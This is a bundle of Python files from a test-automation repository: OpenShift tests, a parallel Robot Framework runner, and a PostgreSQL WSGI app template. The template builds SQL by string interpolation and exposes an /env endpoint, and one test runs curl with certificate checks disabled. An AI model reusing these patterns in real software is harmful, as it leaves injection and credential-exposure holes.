"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3271, "license_type": "no_license", "max_line_length": 158, "num_lines": 89, "path": "/automation/open/testmodules/RT/job_related/create_domain.py.O", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport common\nimport rhtest\nimport OSConf\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n etc_dir = common.get_etc_dir()\n common.env_setup()\n self.domain_name = common.getRandomString(10)\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.key_files = \"%s/libra_key/id_rsa*\" %(etc_dir)\n if self.get_run_mode() == \"OnPremise\":\n self.pem_file = \"%s/onpremise/onpremise.pem\" %(etc_dir)\n else:\n self.pem_file = \"%s/libra.pem\" %(etc_dir)\n self.max_gears = common.DEV_MAX_GEARS\n\n def finalize(self):\n pass\n\n\nclass CreateDomain(OpenShiftTest):\n def test_method(self):\n if not os.path.exists(os.path.expanduser(\"~/.ssh/id_rsa.pub\")):\n # only copy the pre-configured id_rsa if one does not exist\n self.info(\"Copy already prepared libra ssh key file\")\n ret = common.command_get_status(\"mkdir -p $HOME/.ssh && chmod 400 %s %s && cp -rf %s $HOME/.ssh\" %(self.key_files, self.pem_file, self.key_files))\n self.assert_equal(ret, 0, \"~/.ssh dir is created, and libra key files are copied\")\n\n #common.prepare_libra_sshkey()\n #common.clean_up(user_email, user_passwd)\n\n self.info(\"Create/Alter domain for express user\")\n ret = common.create_domain(self.domain_name, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd)\n if ret!=0:\n ret = common.alter_domain(self.domain_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"domain should be created/altered successfully\")\n\n self.info(\"Remove 'default' ssh key for user\")\n common.remove_sshkey()\n\n self.info(\"Add ssh key\")\n ret = common.add_sshkey()\n self.assert_equal(ret, 0, \"Failed to add/update ssh key for user\")\n\n self.info(\"Remove ssh known hosts in case host key changes\")\n path = os.path.expanduser(\"~/.ssh/known_hosts\")\n if os.path.exists(path):\n os.remove(path)\n\n self.info(\"Change permission of %s to 600\" %(self.pem_file))\n ret = common.command_get_status(\"chmod 600 %s\" %(self.pem_file))\n self.assert_equal(ret, 0, \"permission of %s should be changed to 600\" %(self.pem_file))\n if self.get_run_mode() == 'DEV' or self.get_run_mode() == 'OnPremise':\n self.info(\"Set max gears to %s\" % (self.max_gears))\n ret = common.set_max_gears(self.user_email, self.max_gears)\n self.assert_equal(ret, 0, \"Failed to set max gears\")\n\n #if common.is_multinode_env():\n # common.setup_multi_node_env()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CreateDomain)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6217313408851624, "alphanum_fraction": 0.6277869343757629, "avg_line_length": 34.53056335449219, "blob_id": "ed1280fe5826ab3838f6a189aad99ce24b7b0390", "content_id": "8476e8d043163bb0a759039fbe41340e18f05c68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14532, "license_type": "no_license", "max_line_length": 113, "num_lines": 409, "path": "/parabot/parabot.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n#\n# Script to execute test cases from one suite in parallel\n# by thomas klein / 2009\n#\n\n#parabot.py -- main test execution class\n\n\n# imports\nfrom robot.running import TestSuite\nfrom robot import utils\nfrom robot.conf import settings\nimport os, glob\nimport subprocess\nimport time\nfrom datetime import datetime\nimport sys\nimport getopt\nimport ParabotConfig as config\n\n# save current time to calculate execution time at the end of the script\nstartTime = datetime.now()\n\n# global vars\nsuite_name = \"No suite defined yet\" # specified via args\nincludeTags = [] # specified via args\nexcludeTags = [] # specified via args\npara_tag = \"parallel\"\nclientCwd = \"No cwd defined\" # specified via testsuite from args\nforceSerialExecution = False\nbaseDir = \"./\"\n\n\n# reading variables from ParabotConfig\nmax_parallel_tests = config.MAX_PARALLEL_TESTS\nmin_test_per_block = config.MIN_TESTS_PER_BLOCK\nlogFolder = config.LOG_DIR\nantBatch = os.path.abspath(config.ANT_BATCH_FILE)\nseCwd = os.path.abspath(config.SELENIUM_GRID_DIR)\nstartSelenium = config.AUTOSTART_SELENIUM\nbrowser = config.SELENIUM_BROWSER\n\n\n# Methods #####################################################################################################\n\ndef splitTestsToBlocks(tests):\n \"\"\" Splits a list of tests into several small lists (blocks) and returns a list containing these lists.\n 'MAX_PARALLEL_TESTS' and 'MIN_TESTS_PER_BLOCK' will be used as criteria for splitting the list. For \n details see configuration hints in ParabotConfig.py.\n \"\"\"\n para_test_blocks = []\n number_of_blocks = -1\n if len(tests) / min_test_per_block > max_parallel_tests:\n number_of_blocks = max_parallel_tests\n else:\n number_of_blocks = len(para_tests) / min_test_per_block\n for i in range(0, number_of_blocks):\n para_test_blocks.append([])\n current_block = 0\n for test in tests:\n block = current_block%number_of_blocks\n para_test_blocks[block].append(test)\n current_block = current_block+1\n return para_test_blocks\n\ndef startSeleniumHub():\n \"\"\" Starts a Selenium Hub on localhost:4444 and return the process handle \n \"\"\"\n hubScript = \"%s launch-hub\" % antBatch\n hubLog = open(os.path.join(logFolder,\"Parabot_Hub_Log.txt\"), \"w\")\n print \"Starting Selenium Hub ...\"\n process = subprocess.Popen(hubScript, cwd=seCwd, stdout=hubLog, stderr=hubLog)\n time.sleep(10)\n return process\n\ndef startSeleniumRC(port):\n \"\"\" Starts a Selenium Remote Control connecting to a Selenium hub on localhost:4444. Process handle to\n the RC will be returned.\n 'port' is the port the RC will be using to communicate with the hub\n \"\"\"\n rcScript = \"%s -Dport=%s -Dhost=127.0.0.1 -DhubURL=http://127.0.0.1:4444 -Denvironment=\\\"%s\\\"\" \\\n \" launch-remote-control\" % (antBatch, port, browser)\n rcLog = open(os.path.join(logFolder,(\"Parabot_RC_%s_Log.txt\" % port)), \"w\")\n print \"Starting Selenium RC (%s) on port %s ...\" % (browser,port)\n process = subprocess.Popen(rcScript, cwd=seCwd, stdout=rcLog, stderr=rcLog)\n return process\n\ndef startSeleniumRCs(howMuch):\n \"\"\" Starts a given number of Selenium Remote Controls (calls startSeleniumRC(port)) and returns a list \n of processes referring to the RCs. Ports 5556 and up will be used for the RCs.\n 'howMuch' defines the number of RCs to start\n \"\"\"\n rcs = []\n for i in range(5556, 5556+howMuch):\n rcs.append(startSeleniumRC(i))\n time.sleep(5)\n return rcs\n\ndef startPybot(name, tests, suite, args=[]):\n \"\"\" Creates a pybot object, starts it and returns the object\n 'name' is the name for the pybot (will be used for log outputs)\n 'tests' is a list of tests to be executed by the pybot\n 'suite' is the filename of the test suite containing the 'tests'\n 'args' (optional) is a list of additional parameters passed to pybot\n \"\"\"\n pybot = Pybot(name)\n pybot.start(tests, suite, args)\n return pybot\n\ndef generateReportAndLog(xmlFiles, reportFile, logFile):\n \"\"\" Calls RobotFrameworks rebot tool to generate Report and Log files from output.xml files\n 'xmlFiles' is a list of output.xml files from jybot / pybot\n 'reportFile' is the path+name of the report.html file to be written\n 'logFile' is the path+name of the log.html file to be written\n the global variable 'suite_name' will be used a report title\n \"\"\"\n rebotCommand = \"rebot.bat --log %s --report %s --reporttitle \\\"%s\\\" \" % (logFile, reportFile, suite_name)\n for file in xmlFiles:\n rebotCommand = rebotCommand + \"%s \" % file\n rc = os.system(rebotCommand)\n return rc\n\ndef parseArgs(argv):\n \"\"\" Parses command line arguments like the testsuite name and additonal parameters \n Expects the command line args without the python class as parameter argv (sys.argv[1:])\n Fails and aborts script if args don't match the expected format\n \"\"\"\n global includeTags, excludeTags, suite_name, clientCwd, forceSerialExecution, baseDir, logFolder\n if len(argv)<1:\n usage()\n sys.exit(2)\n try:\n # checking for additional options (-h -i -e etc)\n opts, args = getopt.getopt(argv, \"hi:e:fb:\", [\"help\", \"include=\", \"exclude=\", \"forceserial\", \"basedir=\"])\n for opt, arg in opts:\n if opt in (\"-h\", \"--help\"):\n usage()\n sys.exit(2)\n elif opt in (\"-i\", \"--include\"):\n includeTags.append(arg)\n elif opt in (\"-e\", \"--exclude\"):\n excludeTags.append(arg)\n elif opt in (\"-f\", \"--forceserial\"):\n forceSerialExecution = True\n print \"Forcing serial test execution!\"\n elif opt in (\"-b\", \"--basedir\"):\n baseDir = arg\n if len(argv)==2:\n usage()\n sys.exit(2)\n if len(includeTags) > 0:\n print \"Including Tags: %s\" % includeTags\n if len(excludeTags) >0:\n print \"Excluding Tags: %s\" % excludeTags\n except getopt.GetoptError:\n print \"Error while parsing command line arguments\"\n sys.exit(2)\n # last argument is test suite name\n suite_name = argv[len(argv)-1]\n clientCwd, suite_name = os.path.split(suite_name)\n if len(clientCwd) == 0:\n clientCwd = \"./\"\n suite_name = os.path.join(baseDir, suite_name)\n logFolder = os.path.join(clientCwd, logFolder)\n logFolder = os.path.abspath(logFolder)\n print \"Working dir: %s\" % os.path.realpath(clientCwd)\n print \"Base dir: %s\" % os.path.realpath(baseDir);\n print \"Log dir: %s\" % logFolder\n print \"Executing suite: %s\" % suite_name\n\ndef getDynArgs(index):\n \"\"\" Reads the DYN_ARGS variable from the config file and parses it into a list of argument strings\n like --variable name:\"value\".\n This list can be passed to the Pybot start() method as args[] list.\n \"\"\"\n arglist = []\n for row in config.DYN_ARGS:\n valueIndex = index\n if len(row) < 2:\n print \"Error reading DYN_ARGS: Row is invalid: %s. Row will be skipped!\" % row\n else:\n varName = row[0]\n values = []\n i = 1\n while i < len(row):\n values.append(row[i])\n i = i+1\n if valueIndex >= len(values):\n valueIndex = (len(values)-1) % valueIndex\n varValue = values[valueIndex]\n arglist.append(\"--variable %s:\\\"%s\\\"\" % (varName, varValue))\n return arglist\n\ndef usage():\n \"\"\" Prints usage information for Parabot \"\"\"\n print \"\"\n print \"Usage: python parabot.py [options] <testsuite.tsv>\"\n print \"\"\n print \"<testsuite.tsv> can be absolute or relative path + filename of a testsuite.\"\n print \"The containing folder will be used as working directory\"\n print \"\"\n print \"Options:\"\n print \"-h\\t--help\\t\\tThis screen\"\n print \"-i\\t--include\\tInclude a tag\"\n print \"-e\\t--exclude\\tExclude a tag\"\n print \"-f\\t--forceserial\\tForces serial test execution\"\n print \"-b\\t--basedir\\tSet parabots base dir\"\n print \"\"\n\n# helper classes ##############################################################################################\n\nclass Pybot():\n \"\"\" Helper class to interact with RobotFrameworks pybot script to execute tests / test suites. \n \"\"\"\n name = \"\"\n tests = []\n suite = \"\"\n args = []\n output = \"\"\n process = -1\n running = False\n \n def __init__(self, name):\n \"\"\" Constructor, creates the object and assigns the given 'name'.\n \"\"\"\n self.name = name\n print \"Created pybot %s.\" %name\n \n def start(self, tests, suite, args=[]):\n \"\"\" Starts the pybot script from RobotFramework executing the defined 'tests' from the given 'suite'.\n 'tests' is a list of tests to be executed by the pybot\n 'suite' is the filename of the test suite containing the 'tests'\n 'args' (optional) is a list of additional parameters passed to pybot\n \"\"\"\n self.tests = tests\n self.suite = suite\n self.args = args\n temp, suiteName = os.path.split(suite_name)\n self.output = \"%s_%s_Output.xml\" % (suiteName, self.name)\n pybotCommand = \"pybot.bat \"\n for test in self.tests:\n pybotCommand = pybotCommand + \"-t \\\"%s\\\" \" % test\n for arg in self.args:\n pybotCommand = pybotCommand + arg + \" \"\n pybotCommand = pybotCommand + \"-o %s \" % os.path.join(logFolder, self.output)\n pybotCommand = pybotCommand + \"-l NONE \"\n pybotCommand = pybotCommand + \"-r NONE \"\n pybotCommand = pybotCommand + \"-N \\\"%s %s\\\" \" % (suiteName, self.name)\n pybotCommand = pybotCommand + suite\n #print pybotCommand\n pyLog = open(os.path.join(logFolder, (\"Pybot_%s_Log.txt\" % self.name)), \"w\")\n print \"Starting pybot %s ...\" % self.name\n self.running = True\n self.process = subprocess.Popen(pybotCommand, cwd=clientCwd, stdout=pyLog, stderr=pyLog)\n \n def isRunning(self):\n \"\"\" Polls the pybot subprocess to check if it's running. Will return true if the process is running.\n Returns false if the process hasn't been started or has finished already.\n \"\"\"\n if not self.running:\n return False\n elif self.process.poll() == 0 or self.process.returncode >= 0:\n return False\n else:\n return True\n \n def stop(self):\n \"\"\" Kills the pybot subprocess.\n \"\"\"\n os.system(\"taskkill /T /F /PID %s\" % self.process.pid)\n self.running = False\n\n# MAIN SCRIPT #################################################################################################\n\n# parsing command line arguments\nparseArgs(sys.argv[1:])\n\n# generating two lists containing parallel and serial tests\npara_tests = []\nseri_tests = []\ntry:\n # RobotFramework 2.0.4\n suite = TestSuite(os.path.join(clientCwd, suite_name), process_curdir=False)\nexcept Exception:\n # RobotFramework 2.5\n suiteOps = settings.RobotSettings()\n suite = TestSuite([os.path.join(clientCwd, suite_name)], suiteOps)\n\nfor test in suite.tests:\n # special treatment for tests without tags:\n # include them into serial execution as long as no include tags are defined\n if not test.tags and len(includeTags)==0:\n seri_tests.append(test.name)\n # tests with tags:\n # filter excluded tests (if any), then filter included tests (if any), then scan for\n # parallel keyword and assign to parallel / serial block\n elif len(excludeTags)==0 or not test._contains_any_tag(excludeTags):\n if len(includeTags)==0 or test._contains_any_tag(includeTags):\n if test._contains_tag(para_tag) and not forceSerialExecution:\n para_tests.append(test.name)\n else:\n seri_tests.append(test.name)\n\n# output serial test list\nprint \"\"\nprint \"Serial tests:\"\nif len(seri_tests) == 0:\n print \"NONE\"\nelse:\n for test in seri_tests:\n print test\n \n# splitting parallel tests into blocks \npara_test_blocks = splitTestsToBlocks(para_tests)\n\n# output parallel test list\nprint \"\"\nprint \"Parallel Blocks:\"\nfor block in para_test_blocks:\n print \"\"\n for test in block:\n print test\nif len(para_test_blocks) == 0:\n print \"NONE\"\nprint \"\"\n\n\n# starting selenium components\nif startSelenium:\n seHub = startSeleniumHub()\n numberOfRCs = max(len(para_test_blocks), 1)\n seRCs = startSeleniumRCs(numberOfRCs)\n\n# starting parallel pybots\ni = 0;\npybots = []\nfor block in para_test_blocks:\n dynArgs = getDynArgs(i);\n pybots.append(startPybot(\"paraBlock_%s\" % i, block, suite_name, dynArgs))\n i = i+1\n # delay start of next pybot\n time.sleep(5)\n\n# waiting for parallel tests to finish\nfinished = False\nwhile not finished:\n time.sleep(10)\n message = \"Finished: %s\" % finished\n finished = True\n for pybot in pybots:\n message = \"%s | %s: \" % (message, pybot.name)\n if pybot.isRunning():\n finished = False\n message = \"%s%s\" % (message, \"Running\")\n else:\n message = \"%s%s\" % (message, \"DONE\")\n print message\n \nprint \"Parallel Tests finished ...\"\n\n\n# running serial block\npybot = None\nif len(seri_tests) > 0:\n print \"\"\n print \"Starting serial tests ...\"\n pybot = startPybot(\"serial_block\", seri_tests, suite_name, getDynArgs(0))\n while pybot.isRunning():\n time.sleep(5)\n \n print \"Serial tests finished\"\n print \"\"\n\n\n# killing Selenium Hub / RCs\nif startSelenium:\n print \"Killing Selenium Hub and RCs\"\n os.system(\"taskkill /T /F /PID %s\" % seHub.pid)\n for rc in seRCs:\n os.system(\"taskkill /T /F /PID %s\" % rc.pid)\n print \"\"\n\n\n# merging outputs to one report and log\nprint \"Generating report and log\"\ntemp, suiteName = os.path.split(suite_name)\nreport = \"%s_Report.html\" % os.path.join(logFolder, suiteName)\nlog = \"%s_Log.html\" % os.path.join(logFolder, suiteName)\noutputXmls = []\nif pybot != None:\n outputXmls.append(os.path.join(logFolder, pybot.output))\nfor pybot in pybots:\n outputXmls.append(os.path.join(logFolder, pybot.output))\n\nreportRC = generateReportAndLog(outputXmls, report, log)\n\n\n# delete XML output files after generating the report / log (if report generation \n# returned zero)\n#if reportRC == 0:\n# for outXML in outputXmls:\n# os.remove(outXML)\n\n# calculating test execution time\nendTime = datetime.now()\nexecutionTime = endTime - startTime\nprint \"\"\nprint \"Execution time: %s\" % executionTime\n" }, { "alpha_fraction": 0.6034482717514038, "alphanum_fraction": 0.6050646305084229, "avg_line_length": 26.294116973876953, "blob_id": "feb8f79238ecd8739eebedc5a6c35c218479f848", "content_id": "fd790c9d5bf208aed201ef834bd585bbd1282a3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1856, "license_type": "no_license", "max_line_length": 97, "num_lines": 68, "path": "/automation/open/testmodules/UI/login/login.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import rhtest\nimport database\nimport time\nimport autoweb\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n ITEST = \"UI\"\n\n def initialize(self):\n #tb = self.config.testbed\n self.ip = self.config.instance_info['ip']\n self.info(\"IP: %s\" % self.ip)\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n self.web = self.config.web\n \n\n def finalize(self):\n self.info(\"Closing webdriver\")\n print self.driver\n self.web.driver.close()\n\nclass LoginPage(OpenShiftTest):\n def test_check_login_form(self):\n self.web.go_to_home()\n self.web.go_to_signin()\n self.web.assert_element_present_by_link_text(\"Forgot your password?\")\n self.web.assert_element_present_by_link_text(\"create an account\")\n self.web.assert_element_present_by_css(\"input.btn\")\n \n def test_login_invalid_user(self):\n \"\"\" test invalid user \"\"\"\n self.web.go_to_home()\n self.web.go_to_signin()\n self.web.login(\"baduser\", \"vostok08\")\n self.web.assert_text_equal_by_css(\"Invalid username or password\",\"div.alert.alert-error\")\n\n def test_method(self):\n errorCount = 0\n self.test_check_login_form()\n self.test_login_invalid_user()\n #web = self.config.web\n # test_check_login_form\n #web.go_to_home()\n #web.go_to_signin()\n\n self.info(\"Test: Check login form\")\n\n if errorCount:\n return self.failed(\"LoginPage test failed.\")\n else:\n return self.passed(\"LoginPage test passed.\")\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(LoginPage)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5897868871688843, "alphanum_fraction": 0.60118168592453, "avg_line_length": 32.842857360839844, "blob_id": "61145f3c4653ea16a7b2f4e8fdec33412a86fa7f", "content_id": "cb126827b506aa30bd68af30b75a3b3011316a04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4739, "license_type": "no_license", "max_line_length": 126, "num_lines": 140, "path": "/automation/open/testmodules/RT/cartridge/rhc_ctl_rockmongo.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nLinqing Lu\[email protected]\nDec 12, 2011\n\n[US1545][BusinessIntegration][embed_web_interface]Control rockmongo using 'rhc cartridge'\nhttps://tcms.engineering.redhat.com/case/123974/\n\"\"\"\nimport os,sys,re\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US1545][BusinessIntegration][embed_web_interface]Control rockmongo using 'rhc cartridge'\"\n try:\n self.test_variant = self.get_variant()\n except:\n self.test_variant = 'jbossews'\n self.app_name = self.test_variant.split('-')[0] + common.getRandomString(4)\n self.app_type = common.app_types[self.test_variant]\n self.steps_list = []\n common.env_setup()\n\n def finalize(self):\n pass\n\nclass RhcCtlRockmongo(OpenShiftTest):\n\n def test_method(self):\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Create an %s app: %s\" % (self.app_type, self.app_name),\n common.create_app,\n function_parameters = [self.app_name, self.app_type],\n expect_description = \"App should be created successfully\",\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"embed mongodb into app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"add-mongodb-2.2\"],\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"embed rockmongo into app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"add-rockmongo-1.1\"],\n expect_return = 0))\n\n self.steps_list.append( testcase.TestCaseStep(\n \"check whether rockmongo working\",\n self.check_rockmongo,\n expect_return = 0))\n\n self.steps_list.append( testcase.TestCaseStep(\n \"stop rockmongo of app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"stop-rockmongo-1.1\"],\n expect_return = 0))\n\n self.steps_list.append( testcase.TestCaseStep(\n \"check whether rockmongo stopped\",\n self.check_rockmongo,\n function_parameters = ['True'],\n expect_return = 0))\n\n self.steps_list.append( testcase.TestCaseStep(\n \"start rockmongo in app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"start-rockmongo-1.1\"],\n expect_return = 0))\n\n self.steps_list.append( testcase.TestCaseStep(\n \"check whether rockmongo working\",\n self.check_rockmongo,\n expect_return = 0))\n\n self.steps_list.append( testcase.TestCaseStep(\n \"start rockmongo in app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"restart-rockmongo-1.1\"],\n expect_return = 0))\n\n self.steps_list.append( testcase.TestCaseStep(\n \"check whether rockmongo working\",\n self.check_rockmongo,\n expect_return = 0))\n\n self.steps_list.append( testcase.TestCaseStep(\n \"start rockmongo in app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"reload-rockmongo-1.1\"],\n expect_return = 0))\n\n self.steps_list.append( testcase.TestCaseStep(\n \"check whether rockmongo working\",\n self.check_rockmongo,\n expect_return = 0))\n\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def check_rockmongo(self, negative = False):\n keyword = \"RockMongo\"\n if negative:\n keyword = \"503 Service Temporarily Unavailable\"\n url = OSConf.get_embed_info(self.app_name, common.cartridge_types[\"rockmongo\"], \"url\")+\"/index.php?action=login.index\"\n ret = common.grep_web_page(url, keyword, options=\"-k -H 'Pragma: no-cache'\", delay=8, count=10)\n os.system(\"curl -k -H 'Pragma: no-cache' %s\"% url)\n return ret\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcCtlRockmongo)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5820964574813843, "alphanum_fraction": 0.5899814367294312, "avg_line_length": 36.17241287231445, "blob_id": "b45c5fdd5db9f18c396526afaa5976888d4f5c95", "content_id": "22800093daf508eee0142a6bc603a1cb437f7a64", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2156, "license_type": "no_license", "max_line_length": 279, "num_lines": 58, "path": "/automation/open/testmodules/RT/cartridge/app_template/postgresql/python-2.7/application", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport psycopg2\n\n\nconn_str = \"dbname=%s user=%s password=%s host=%s port=%s\" % (os.environ['OPENSHIFT_APP_NAME'], os.environ['OPENSHIFT_POSTGRESQL_DB_USERNAME'], os.environ['OPENSHIFT_POSTGRESQL_DB_PASSWORD'], os.environ['OPENSHIFT_POSTGRESQL_DB_HOST'], os.environ['OPENSHIFT_POSTGRESQL_DB_PORT'])\n\ndef create_data(data):\n conn = psycopg2.connect(conn_str)\n cur = conn.cursor()\n cur.execute(\"DROP TABLE IF EXISTS info;\")\n cur.execute(\"CREATE TABLE info(id integer PRIMARY KEY, data text);\")\n cur.execute(\"INSERT INTO info VALUES(1, '%s');\" % (data))\n conn.commit()\n conn.close()\n\ndef get_data():\n conn = psycopg2.connect(conn_str)\n cur = conn.cursor()\n cur.execute(\"SELECT data FROM info;\")\n result = cur.fetchone()\n conn.close()\n return result[0]\n\n\ndef application(environ, start_response):\n ctype = 'text/plain'\n if environ['PATH_INFO'] == '/health':\n response_body = \"1\"\n elif environ['PATH_INFO'] == '/env':\n response_body = ['%s: %s' % (key, value)\n for key, value in sorted(environ.items())]\n response_body = '\\n'.join(response_body)\n elif environ['PATH_INFO'] == '/data1.py':\n create_data(\"#str_random1#\")\n response_body = 'Please visit /show.py to see the data'\n elif environ['PATH_INFO'] == '/data2.py':\n create_data(\"#str_random2#\")\n response_body = 'Please visit /show.py to see the data'\n elif environ['PATH_INFO'] == '/show.py':\n response_body = get_data()\n else:\n response_body = 'PostgreSQL test'\n\n status = '200 OK'\n response_headers = [('Content-Type', ctype), ('Content-Length', str(len(response_body)))]\n #\n start_response(status, response_headers)\n return [response_body]\n\n#\n# Below for testing only\n#\nif __name__ == '__main__':\n from wsgiref.simple_server import make_server\n httpd = make_server('localhost', 8051, application)\n # Wait for a single request, serve it and quit.\n httpd.handle_request()\n" }, { "alpha_fraction": 0.5794411897659302, "alphanum_fraction": 0.6057130694389343, "avg_line_length": 43.39814758300781, "blob_id": "a175c9673c1bae4add9a5a909ee75941399f994d", "content_id": "94a39bb0381003a5affc35c4576679c245e70242", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4796, "license_type": "no_license", "max_line_length": 186, "num_lines": 108, "path": "/automation/open/testmodules/UI/web/case_165723.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_165723.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CheckWikiIndexPage(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n \n #check with invalid password\n #web.go_to_home()\n web.go_to_community()\n web.click_element_by_xpath('''//a[contains(@href, '/community/open-source')]''')\n web.click_element_by_xpath('''//a[contains(@href, '/community/wiki/index')]''')\n time.sleep(2)\n\n #check the \"architecture-overview\" link \n web.click_element_by_xpath('''//div[@id='node-9485']/div/table/tbody/tr[2]/td/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Architecture Overview''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back() \n #check the \"Build Multi-node PaaS from scratch\" link \n web.click_element_by_xpath('''//div[@id='node-9485']/div/table/tbody/tr[3]/td/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Build Multi-node PaaS from scratch''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back() \n #check the \"Build Your Own PaaS\" link \n web.click_element_by_xpath('''//div[@id='node-9485']/div/table/tbody/tr[4]/td/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Build Your Own PaaS''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back() \n #check the \"Build Your Own Paas from the OpenShift Origin LiveCD using liveinst\" link \n web.click_element_by_xpath('''//div[@id='node-9485']/div/table/tbody/tr[5]/td/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Build Your Own Paas from the OpenShift Origin LiveCD using liveinst''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back() \n #check the \"Build Your Own PaaS: Base Operating System and Configuration\" link \n web.click_element_by_xpath('''//div[@id='node-9485']/div/table/tbody/tr[6]/td/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Build Your Own PaaS: Base Operating System and Configuration''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back() \n #check the \"Build Your Own PaaS: Installing the Broker\" link \n web.click_element_by_xpath('''//div[@id='node-9485']/div/table/tbody/tr[7]/td/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Build Your Own PaaS: Installing the Broker''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back() \n #check the \"build-your-own\" link \n web.click_element_by_xpath('''//div[@id='node-9485']/div/table/tbody/tr[8]/td/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''build-your-own''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back() \n #check the \"Build-your-own/prepare-the-base-os\" link \n web.click_element_by_xpath('''//div[@id='node-9485']/div/table/tbody/tr[9]/td/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Build-your-own/prepare-the-base-os''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back() \n #check the \"Community Process\" link \n web.click_element_by_xpath('''//div[@id='node-9485']/div/table/tbody/tr[10]/td/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Community Process''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back() \n #check the \"Connect to Openshift Origin installation with JBoss Tools\" link \n web.click_element_by_xpath('''//div[@id='node-9485']/div/table/tbody/tr[11]/td/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Connect to Openshift Origin installation with JBoss Tools''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back() \n\n self.tearDown()\n\n return self.passed(\" case_165723--CheckWikiIndexPage passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckWikiIndexPage)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of 